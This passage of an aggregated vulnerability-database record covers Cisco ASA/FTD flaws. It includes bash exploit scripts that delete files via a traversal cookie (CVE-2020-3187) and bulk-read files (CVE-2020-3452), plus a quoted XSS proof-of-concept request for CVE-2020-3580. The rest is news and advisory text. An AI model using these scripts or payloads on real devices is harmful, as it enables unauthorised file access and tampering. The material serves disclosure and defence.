404]; then\r\necho \"Deleted!, $website is vulnerable to CVE-2020-3187.\"\r\nelse\r\necho \"Cannot Delete $website/+CSCOU+/$delete file, check it manaully!\"\r\nfi\r\nelse\r\necho \"$website/+CSCOU+/$delete doesn't exist!\"\r\nfi\r\n\r\nelse\r\nwhile IFS= read -r line\r\ndo\r\necho \"Checking $line if file $delete exist..\"\r\n#echo $response\r\nstatus=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w\r\n'%{http_code}\\n' -s)\r\nif [ $status -eq 200 ]; then\r\necho \"$line/+CSCOU+/$delete exists, deleting it...\"\r\ncurl -H \"Cookie: token=..//+CSCOU+/$delete\" -v -s -o\r\nresults.txt 
$line/+CSCOE+/session_password.html\r\n\r\n#for no verbosity\r\n#curl -H \"Cookie: token=..//+CSCOU+/$delete\" -s -o\r\nresults.txt $line/+CSCOE+/session_password.html\r\ndelcheck=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w\r\n'%{http_code}\\n' -s)\r\nif [ delcheck -eq 404]; then\r\necho \"Deleted!, $line is vulnerable to CVE-2020-3187.\"\r\nelse\r\necho \"Cannot Delete $line/+CSCOU+/$delete file, check it manaully!\"\r\nfi\r\nelse\r\necho \"$line/+CSCOU+/$delete doesn't exist!\"\r\nfi\r\ndone < \"$input\"\r\n\r\n\r\nfi\r\n\r\n\r\n\r\n\r\n#!/bin/bash\r\n\r\n\r\nread=\"%2bCSCOE%2b/portal_inc.lua\"\r\n\r\n\r\nhelpFunction()\r\n{\r\n echo \"\"\r\n echo -e \"\\t\\tCVE-2020-3452\"\r\n echo \"\"\r\n echo \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \"\r\n echo -e \"\\t-l for list of IPs in text file\"\r\n echo -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\"\r\n echo -e \"\\t-i for single IP test\"\r\n exit 1\r\n}\r\n\r\nwhile getopts \"l:r:i:\" opt\r\ndo\r\n case \"$opt\" in\r\n l ) input=\"$OPTARG\" ;;\r\n r ) read=\"$OPTARG\" ;;\r\n i ) website=\"$OPTARG\" ;;\r\n ? 
) helpFunction ;;\r\n esac\r\ndone\r\n\r\n\r\n\r\n#if $website is empty or $input is empty\r\nif [ -z \"$website\" ] && [ -z \"$input\" ]\r\nthen\r\n echo \"Some/all of the parameters are empty\";\r\n helpFunction\r\nfi\r\n\r\n#usage\r\n\r\n\r\nif [ -z \"$website\"];\r\n then\r\n while IFS= read -r line\r\n do\r\n name=$(echo $line | cut -c9-19)\r\n #echo \"testing $line\"\r\n filename=\"$name.txt\"\r\n #echo $response\r\n status=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n\r\n if [ $status -eq \"400\" ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n wget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n\r\n if [ -s $filename ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n echo \"downloaded!, $line is vulnerable to CVE-2020-3452.\"\r\n\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n done < \"$input\"\r\n else\r\n\r\n name=$(echo $website | cut -c9-16)\r\n filename=\"$name.txt\"\r\n\r\n status=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n if [ $status -eq \"Bad Request\" ]; then\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n wget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n if [ -s $filename ]; then\r\n echo \"downloaded!, $website is vulnerable to 
CVE-2020-3452.\"\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n\r\nfi", "sourceHref": "https://www.exploit-db.com/download/48723", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2021-02-24T14:27:01", "description": "Imperva\u2019s report, [**The State of Vulnerabilities in 2020**](<https://www.imperva.com/resources/resource-library/reports/the-state-of-vulnerabilities-in-2020/>) has revealed that unlike in previous years, researchers observed a fall in the number of vulnerabilities last year, even as businesses were compelled to accelerate digital transformation processes due to the COVID-19 pandemic. Vulnerabilities are defined as the gaps or weaknesses that undermine an organization\u2019s IT security efforts, such as a firewall flaw that enables hackers into a network.\n\nThe overall number of new vulnerabilities in 2020 (23,006) was down by 2.04% compared to 2019 (23,485) and by 0.86% compared to 2018 (23,207).\n\nAccording to the report, the dominant root cause of vulnerabilities was [cross-site scripting](<https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/>) (XSS) with injection as the second-most dominant root cause. Drilling down into the report data, the researchers note that a large percentage of this appeared to be related to [SQL injection](<https://www.imperva.com/learn/application-security/sql-injection-sqli/>). While XSS was the dominant root cause of vulnerabilities, most of the attacks in 2020 were related to injection vulnerabilities rather than XSS. Only 15.68% of the attacks that Imperva registered were related to XSS. On the contrary, the injection vulnerability category appeared to be the attackers\u2019 \u201cfavorite\u201d with 44.75% of all attacks. 
After injection vulnerability, path traversal and local file include (LFI) attacks were the attackers\u2019 second \u201cfavorite\u201d with 24.83%.\n\nSocial media, in fact, echoed this finding with 75% of the top 20 most viral tweets being related to the leading attack category, injection and remote code execution. Researchers observed a high correlation between the chatter in social media and actual attacks. Analyzing tweets from Twitter, the two most trending vulnerabilities on social media belonged to CVE-2020-5902 and CVE-2020-3452 which were also the top vulnerabilities used by hackers in 2020.\n\nImperva researchers continued to see a constant growth of vulnerabilities in APIs (Application Programming Interfaces) in 2020, with WordPress the most popular platform in the content management system category. In the server side technologies category, the report indicates an increase in the number of vulnerabilities in applications or packages written in JavaScript for NodeJS.\n\nThe report also shows MySQL to be ahead of all other popular databases in terms of new vulnerabilities discovered in 2020, although 92.4% of these had an unknown exploit. This is likely because Oracle acquired MySQL and doesn\u2019t usually share technical details in its security reports. Additional analysis of bug bounty vulnerabilities revealed that almost 40% of them were ranked as Critical.\n\n### Vulnerabilities and cyber security attacks forecast for 2021\n\nGiven the degree to which APIs have become a necessary element for applications, Imperva researchers expect to see constant growth in the number of API vulnerabilities, although the rate of this growth is likely to decrease in 2021. 
The release of the OWASP API Security - Top 10 which standardizes the main threats in APIs will increase the awareness of security among developers and play a role in decreasing vulnerabilities.\n\nOld faithful injection and XSS vulnerabilities will remain a serious concern, despite greater awareness and the number of tools that check code for their presence. The reason for this is the direct impact of the exploitation of these vulnerabilities, as well as - in most cases - the lack of preconditions required to exploit them. Injection vulnerabilities may also lead to [supply chain attacks](<https://www.imperva.com/learn/application-security/supply-chain-attack/>) resulting in [PII](<https://www.imperva.com/learn/data-security/personally-identifiable-information-pii/>) data theft.\n\nThe number of vulnerabilities in third-parties will continue to grow, as major platforms and frameworks become more reliant on third-party plugins. These vulnerabilities may be the gateway to various supply chain attacks. WordPress has over 58,000 plugins, the NPM registry has almost 1.5 million packages for NodeJS, and PyPI has over 280,000 packages for Python. In addition, there are also main package registries for Java and Ruby-based projects. As the community continues to grow, and without code standards or restrictions to publish a plugin or a package, they remain the weakest point in an application, making them the sweet spot for attackers.\n\nDownload the full report [here](<https://www.imperva.com/resources/resource-library/reports/the-state-of-vulnerabilities-in-2020/>).\n\n### Protect your apps from attack with a Web Application Firewall (WAF)\n\nOne of the best solutions for protecting against web application database vulnerabilities is to deploy a [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Data Monitoring & Protection. 
The solution may be either on-premise, in the cloud, or a combination of both depending on your needs, infrastructure, and more. Start a [free trial](<https://www.imperva.com/free-trial/>) today.\n\nThe post [Despite COVID-19 pandemic, Imperva reports number of vulnerabilities decreased in 2020](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T19:42:10", "type": "impervablog", "title": "Despite COVID-19 pandemic, Imperva reports number of vulnerabilities decreased in 2020", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-02-22T19:42:10", "id": "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "href": "https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-07-20T20:11:22", "description": "A 
vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n \n**Recent assessments:** \n \n**todmephis** at September 30, 2020 3:37pm UTC reported:\n\nNothing valuable was exposed by vulnerability, also it was not possible to expand the scope or weaponize it. 
\nThis module was also tested with no success: <https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md> \nPoC: <https://twitter.com/aboul3la/status/1286012324722155525> \n<https://www.youtube.com/watch?v=74ExOh6BVxk>\n\nFile Entry Points:\n\nlogo.gif \nhttp_auth.html \nuser_dialog.html \nlocalization_inc.lua \nportal_inc.lua \ninclude \nnostcaccess.html \nask.html \nno_svc.html \nsvc.html \nsession.js \nuseralert.html \nping.html \nhelp \napp_index.html \ntlbr \nportal_forms.js \nlogon_forms.js \nwin.js \nportal.css \nportal.js \nsess_update.html \nblank.html \nnoportal.html \nportal_ce.html \nportal.html \nhome \nlogon_custom.css \nportal_custom.css \npreview.html \nsession_expired \ncustom \nportal_elements.html \ncommonspawn.js \ncommon.js \nappstart.js \nappstatus \nrelaymonjar.html \nrelaymonocx.html \nrelayjar.html \nrelayocx.html \nportal_img \ncolor_picker.js \ncolor_picker.html \ncedhelp.html \ncedmain.html \ncedlogon.html \ncedportal.html \ncedsave.html \ncedf.html \nced.html \nlced.html \nfiles \npluginlib.js \nshshim \ndo_url \nclear_cache \nconnection_failed_form \napcf \nucte_forbidden_data \nucte_forbidden_url \ncookie \nsession_password.html \ntunnel_linux.jnlp \ntunnel_mac.jnlp \nsdesktop \ngp-gip.html \nauth.html \nwrong_url.html \nlogon_redirect.html \nlogout.html \nlogon.html \ntest_chargen\n\n**busterb** at July 22, 2020 7:24pm UTC reported:\n\nNothing valuable was exposed by vulnerability, also it was not possible to expand the scope or weaponize it. 
\nThis module was also tested with no success: <https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md> \nPoC: <https://twitter.com/aboul3la/status/1286012324722155525> \n<https://www.youtube.com/watch?v=74ExOh6BVxk>\n\nFile Entry Points:\n\nlogo.gif \nhttp_auth.html \nuser_dialog.html \nlocalization_inc.lua \nportal_inc.lua \ninclude \nnostcaccess.html \nask.html \nno_svc.html \nsvc.html \nsession.js \nuseralert.html \nping.html \nhelp \napp_index.html \ntlbr \nportal_forms.js \nlogon_forms.js \nwin.js \nportal.css \nportal.js \nsess_update.html \nblank.html \nnoportal.html \nportal_ce.html \nportal.html \nhome \nlogon_custom.css \nportal_custom.css \npreview.html \nsession_expired \ncustom \nportal_elements.html \ncommonspawn.js \ncommon.js \nappstart.js \nappstatus \nrelaymonjar.html \nrelaymonocx.html \nrelayjar.html \nrelayocx.html \nportal_img \ncolor_picker.js \ncolor_picker.html \ncedhelp.html \ncedmain.html \ncedlogon.html \ncedportal.html \ncedsave.html \ncedf.html \nced.html \nlced.html \nfiles \npluginlib.js \nshshim \ndo_url \nclear_cache \nconnection_failed_form \napcf \nucte_forbidden_data \nucte_forbidden_url \ncookie \nsession_password.html \ntunnel_linux.jnlp \ntunnel_mac.jnlp \nsdesktop \ngp-gip.html \nauth.html \nwrong_url.html \nlogon_redirect.html \nlogout.html \nlogon.html \ntest_chargen\n\n**ccondon-r7** at August 04, 2020 4:15pm UTC reported:\n\nNothing valuable was exposed by vulnerability, also it was not possible to expand the scope or weaponize it. 
 \nThis module was also tested with no success: <https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md> \nPoC: <https://twitter.com/aboul3la/status/1286012324722155525> \n<https://www.youtube.com/watch?v=74ExOh6BVxk>\n\nFile Entry Points:\n\nlogo.gif \nhttp_auth.html \nuser_dialog.html \nlocalization_inc.lua \nportal_inc.lua \ninclude \nnostcaccess.html \nask.html \nno_svc.html \nsvc.html \nsession.js \nuseralert.html \nping.html \nhelp \napp_index.html \ntlbr \nportal_forms.js \nlogon_forms.js \nwin.js \nportal.css \nportal.js \nsess_update.html \nblank.html \nnoportal.html \nportal_ce.html \nportal.html \nhome \nlogon_custom.css \nportal_custom.css \npreview.html \nsession_expired \ncustom \nportal_elements.html \ncommonspawn.js \ncommon.js \nappstart.js \nappstatus \nrelaymonjar.html \nrelaymonocx.html \nrelayjar.html \nrelayocx.html \nportal_img \ncolor_picker.js \ncolor_picker.html \ncedhelp.html \ncedmain.html \ncedlogon.html \ncedportal.html \ncedsave.html \ncedf.html \nced.html \nlced.html \nfiles \npluginlib.js \nshshim \ndo_url \nclear_cache \nconnection_failed_form \napcf \nucte_forbidden_data \nucte_forbidden_url \ncookie \nsession_password.html \ntunnel_linux.jnlp \ntunnel_mac.jnlp \nsdesktop \ngp-gip.html \nauth.html \nwrong_url.html \nlogon_redirect.html \nlogout.html \nlogon.html \ntest_chargen\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2 \nAssessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2020-07-22T00:00:00", "type": "attackerkb", 
"title": "CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3187", "CVE-2020-3452"], "modified": "2020-12-21T00:00:00", "id": "AKB:63A96584-6094-4433-8AE0-1C1CD1B1C345", "href": "https://attackerkb.com/topics/XGKhvbDsLA/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:54", "description": "[](<https://thehackernews.com/images/-tjjYBmcca9c/YNluSotRJvI/AAAAAAAADAo/Xa7v4Mhy6ckqFcAlDlyulMQJaAFb4NMvwCLcBGAsYHQ/s0/cisco.jpg>)\n\nA security vulnerability in Cisco Adaptive Security Appliance (ASA) that was addressed by the company last October, and again earlier this April, has been subjected to active in-the-wild attacks following the release of proof-of-concept (PoC) exploit code.\n\nThe PoC was [published](<https://twitter.com/ptswarm/status/1408050644460650502>) by researchers from cybersecurity firm Positive Technologies on June 24, following which reports emerged that attackers are chasing after an exploit for the bug.\n\n\"Tenable has also received a report that attackers are exploiting CVE-2020-3580 in the wild,\" the cyber exposure company 
[said](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>).\n\n[](<https://thehackernews.com/images/-2-rqA8MJiRM/YNlrTddMsEI/AAAAAAAADAg/pGvuWEREWDEGI3u_A6lMsi6FBLq6Pr0XwCLcBGAsYHQ/s0/cisco-exploit.jpg>)\n\nTracked as [CVE-2020-3580](<https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-asaftd-xss-multiple-FCB3vPZe.html>) (CVSS score: 6.1), the issue concerns multiple vulnerabilities in the web services interface of Cisco ASA software and Cisco Firepower Threat Defense (FTD) software that could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks on an affected device.\n\nAs of July 2020, there were a little over [85,000 ASA/FTD devices](<https://www.rapid7.com/blog/post/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>), 398 of which are spread across 17% of the Fortune 500 companies, according to cybersecurity company Rapid7.\n\nSuccessful exploitation, such as scenarios where a user of the interface is convinced to click a specially-crafted link, could permit the adversary to execute arbitrary JavaScript code in the context of the interface or access sensitive, browser-based information.\n\nAlthough Cisco remediated the flaw in October 2020, the network equipment company subsequently determined the fix to be \"incomplete,\" thereby requiring a second round of patches that were released on April 28, 2021.\n\nIn light of public PoC availability, it's recommended that organizations prioritize patching CVE-2020-3580 to mitigate the risk associated with the flaw.\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-28T06:39:00", "type": "thn", "title": "Cisco ASA Flaw Under Active Attack After PoC Exploit Posted Online", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452", "CVE-2020-3580"], "modified": "2021-06-30T15:48:38", "id": "THN:E61FB01ED36F5A39FD247813F1A893BD", "href": "https://thehackernews.com/2021/06/cisco-asa-flaw-under-active-attack.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2021-06-25T17:22:55", "description": "Researchers have dropped a proof-of-concept (PoC) exploit on Twitter for a known cross-site scripting (XSS) vulnerability in the Cisco Adaptive Security Appliance (ASA). The move comes as reports surface of in-the-wild exploitation of the bug.\n\nResearchers at Positive Technologies published the PoC for the bug (CVE-2020-3580) on Thursday. 
One of the researchers there, Mikhail Klyuchnikov, noted that there were a heap of researchers now chasing after an exploit for the bug, which he termed \u201clow-hanging\u201d fruit.\n\n> \ud83c\udf81PoC for XSS in Cisco ASA (CVE-2020-3580)\n> \n> POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 \nHost: ciscoASA.local \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 44\n> \n> SAMLResponse=\"><svg/onload=alert('PTSwarm')> [pic.twitter.com/c53MKSK9bg](<https://t.co/c53MKSK9bg>)\n> \n> \u2014 PT SWARM (@ptswarm) [June 24, 2021](<https://twitter.com/ptswarm/status/1408050644460650502?ref_src=twsrc%5Etfw>)\n\n> The hunt for low hanging CVE-2020-3580 by [@ptswarm](<https://twitter.com/ptswarm?ref_src=twsrc%5Etfw>) has begun. \nA lot of submissions/duplicates are waiting for [@Bugcrowd](<https://twitter.com/Bugcrowd?ref_src=twsrc%5Etfw>) and [@Hacker0x01](<https://twitter.com/Hacker0x01?ref_src=twsrc%5Etfw>) [#bugbounty](<https://twitter.com/hashtag/bugbounty?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 n1 (@__mn1__) [June 24, 2021](<https://twitter.com/__mn1__/status/1408064449835978760?ref_src=twsrc%5Etfw>)\n\nMeanwhile, Tenable researchers published an alert about the PoC, noting that it has started to see cyberattacks using the vulnerability on targets in the wild.\n\n\u201cTenable has also received a report that attackers are exploiting CVE-2020-3580 in the wild,\u201d according to its [Thursday alert](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>). 
\u201cWith this new information, Tenable recommends that organizations prioritize patching CVE-2020-3580.\u201d\n\nAnd indeed, the PT PoC tweet was met with plenty of \u201cOoh thanks\u201d and \u201cthank you so much\u201d responses, presumably from would-be hackers.\n\n> Thanks\ud83d\ude00, do we have to be authenticated?\n> \n> \u2014 Qasim (@00x88x) [June 24, 2021](<https://twitter.com/00x88x/status/1408069865798131726?ref_src=twsrc%5Etfw>)\n\nMeanwhile, researchers at WebSec noted that the bug could be exploited for more than XSS:\n\n> You could have gotten 2 CVE numbers for this, as this is not just XSS but also CSRF.\n> \n> \u2014 WebSec (@websecnl) [June 25, 2021](<https://twitter.com/websecnl/status/1408344288900128769?ref_src=twsrc%5Etfw>)\n\n\u201cResearchers often develop PoCs before reporting a vulnerability to a developer and publishing them allows other researchers to both check their work and potentially dig further and discover other issues,\u201d Claire Tills, senior research engineer at Tenable, told Threatpost. \u201cPoCs can also be used by defenders to develop detections for vulnerabilities. Unfortunately, giving that valuable information to defenders means it can also end up in the hands of attackers.\u201d\n\nGiven that a patch has been available for this vulnerability for several months, organizations are able to protect themselves which isn\u2019t the case with 0-day disclosures, she pointed out. \u201cHowever, unpatched vulnerabilities continue to haunt many organizations,\u201d Tills added. 
\u201cThe public availability of a PoC is another stark reminder that effective patching is a vital step for organizations to protect themselves.\u201d\n\n## **Real-World Attacks for Cisco ASA**\n\nThe Cisco ASA is a [cybersecurity perimeter-defense appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) that combines firewall, antivirus, intrusion prevention and virtual private network (VPN) capabilities, all meant to stop threats from making it onto corporate networks. A compromise of the device is akin to unlocking the front door of the castle for storming cyberattackers.\n\nXSS attacks occur when malicious scripts are injected into otherwise benign and trusted websites; any visitors to the compromised websites are thus subject to drive-by attacks.\n\nSuccessful exploitation in this case means that unauthenticated, remote attackers could \u201cexecute arbitrary code within the [ASA] interface and access sensitive, browser-based information,\u201d Tenable added.\n\nOnce in, they could modify the device\u2019s configuration, according to Leo Pate, an application security consultant at nVisium.\n\nHowever, the target would need to be logged into the ASA for the attackers to see any joy. 
\u201cWhile this sounds dangerous, exploiting this vulnerability requires an administrative user to login and navigate to the webpage where the attacker uploaded the malicious code,\u201d he added.\n\nAs Tenable researchers said: \u201cAn attacker would need to convince \u2018a user of the interface\u2019 to click on a specially crafted link.\u201d This can be accomplished via a spear-phishing email campaign targeting probable ASA users using malicious links, or via watering-hole attacks.\n\n\u201cThe attack vector to get this in the hands of the right people is complex requiring a firewall administrator to be duped into clicking a cleverly crafted link,\u201d Andrew Barratt, managing principal for solutions and investigations at Coalfire, told Threatpost. \u201cFirewall administrators will need to ensure they\u2019re not accessing links to the ASA interface that appear to originate from outside.\u201d\n\nTenable declined to provide more information on the real-world attacks when asked by Threatpost.\n\nThanks to the sheer size of its footprint (including inside Fortune 500 companies), the Cisco ASA is no stranger to attention from cyberattackers. 
Last year for example, public PoC for another bug in the device ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)) started making the rounds, leading to a [spate of exploitation efforts](<https://threatpost.com/attackers-exploiting-high-severity-network-security-flaw-cisco-warns/157756/>).\n\n## **Patch Now: Cisco ASA XSS Security Hole**\n\nThe flaw tracked as CVE-2020-3580 [was patched](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe>) on October 21 as part of a group of XSS issues in Cisco\u2019s ASA as well as the Firepower Threat Defense (FTD) software, which is a unified firewall image that includes ASA management.\n\n\u201cAll four vulnerabilities exist because Cisco ASA and FTD software web services do not sufficiently validate user-supplied inputs,\u201d according to the advisory, which noted that the bug in question rates 6.1 out of 10 on the CVSSv3 vulnerability-severity scale.\n\nThe number of vulnerable devices could be significant: [Researchers with Rapid7](<https://blog.rapid7.com/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>) last year found there to be 85,000 internet-accessible ASA devices. Of course, a good percentage of those could be patched against this particular vulnerability.\n\n\u201cExploits for appliances that may sit on the vanishing perimeter generally garner interest [from hackers], but fortunately in this case there are at least two things working against rampant exploitation,\u201d Tim Wade, technical director for the CTO team at Vectra, told Threatpost. \u201cFirst, a patch has been available since October. Second, an element of social engineering is required. 
This should provide some level of confidence for organizations with reasonable patch cycles and a security awareness program.\u201d\n\nUpdating to the latest versions of the affected devices\u2019 software is of course recommended; however, there\u2019s more that can be done to mitigate the vulnerability, nVisium\u2019s Pate noted.\n\n\u201cOrganizations can ask their internal teams if they need to use the web management interface, and if so, is it available to everyone on the internet or just internally to our organization? If the web management interface isn\u2019t needed, then it should be disabled,\u201d he told Threatpost.\n", 
"cvss3": {}, "published": "2021-06-25T16:08:38", "type": "threatpost", "title": "Cisco ASA Bug Now Actively Exploited as PoC Drops", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3452", "CVE-2020-3580"], "modified": "2021-06-25T16:08:38", "id": "THREATPOST:0499757784EF5DB6F115661A76B7C352", "href": "https://threatpost.com/cisco-asa-bug-exploited-poc/167274/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-15T22:16:12", "description": "Cisco is warning that a high-severity flaw in its network security software is being actively exploited \u2013 allowing remote, unauthenticated attackers to access sensitive data.\n\nPatches for the vulnerability ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)) in question, which ranks 7.5 out of 10 on the CVSS scale, were [released last Wednesday](<https://threatpost.com/network-security-cisco-flaw-leaks-sensitive-data/157691/>). 
However, attackers have since been targeting vulnerable versions of the software, where the patches have not yet been applied.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware of the existence of public exploit code and active exploitation of the vulnerability that is described in this advisory,\u201d according to Cisco.\n\nThe flaw specifically exists in the web services interface of Firepower Threat Defense (FTD) software, which is part of Cisco\u2019s suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.\n\nThe potential threat surface is vast: [Researchers with Rapid7](<https://blog.rapid7.com/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>) recently found 85,000 internet-accessible ASA/FTD devices. Worse, 398 of those are spread across 17 percent of the Fortune 500, researchers said.\n\nThe flaw stems from a lack of proper input validation of URLs in HTTP requests processed by affected devices. Specifically, the flaw allows attackers to conduct directory traversal attacks, which is an HTTP attack enabling bad actors to access restricted directories and execute commands outside of the web server\u2019s root directory.\n\nSoon after patches were released, proof-of-concept (POC) exploit code was [released Wednesday](<https://twitter.com/aboul3la>) for the flaw by security researcher Ahmed Aboul-Ela.\n\nA potential attacker can view more sensitive files within the web services file system: The web services files may have information such as WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs.\n\n> There\u2019s a proof of concept doing the rounds for directory path traversal (yes, it\u2019s 1998 again) in Cisco AnyConnect SSL VPN. 
